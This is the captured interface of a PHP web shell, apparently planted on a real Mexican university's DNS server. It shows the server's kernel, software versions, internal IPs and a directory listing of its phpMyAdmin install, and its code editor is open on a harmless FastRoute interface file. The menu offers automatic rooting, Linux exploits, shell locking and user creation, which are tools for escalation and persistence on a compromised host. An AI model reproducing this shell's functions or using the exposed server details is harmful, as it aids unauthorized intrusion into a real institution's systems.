Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
vendor /
nikic /
fast-route /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
DataGenerator
[ DIR ]
drwxr-xr-x
Dispatcher
[ DIR ]
drwxr-xr-x
RouteParser
[ DIR ]
drwxr-xr-x
BadRouteException.php
81
B
-rw-r--r--
bootstrap.php
294
B
-rw-r--r--
DataGenerator.php
682
B
-rw-r--r--
Dispatcher.php
594
B
-rw-r--r--
functions.php
2.49
KB
-rw-r--r--
RouteCollector.php
3.77
KB
-rw-r--r--
RouteParser.php
1.01
KB
-rw-r--r--
Route.php
921
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RouteParser.php
<?php namespace FastRoute; interface RouteParser { /** * Parses a route string into multiple route data arrays. * * The expected output is defined using an example: * * For the route string "/fixedRoutePart/{varName}[/moreFixed/{varName2:\d+}]", if {varName} is interpreted as * a placeholder and [...] is interpreted as an optional route part, the expected result is: * * [ * // first route: without optional part * [ * "/fixedRoutePart/", * ["varName", "[^/]+"], * ], * // second route: with optional part * [ * "/fixedRoutePart/", * ["varName", "[^/]+"], * "/moreFixed/", * ["varName2", [0-9]+"], * ], * ] * * Here one route string was converted into two route data arrays. * * @param string $route Route string to parse * * @return mixed[][] Array of route data arrays */ public function parse($route); }
Close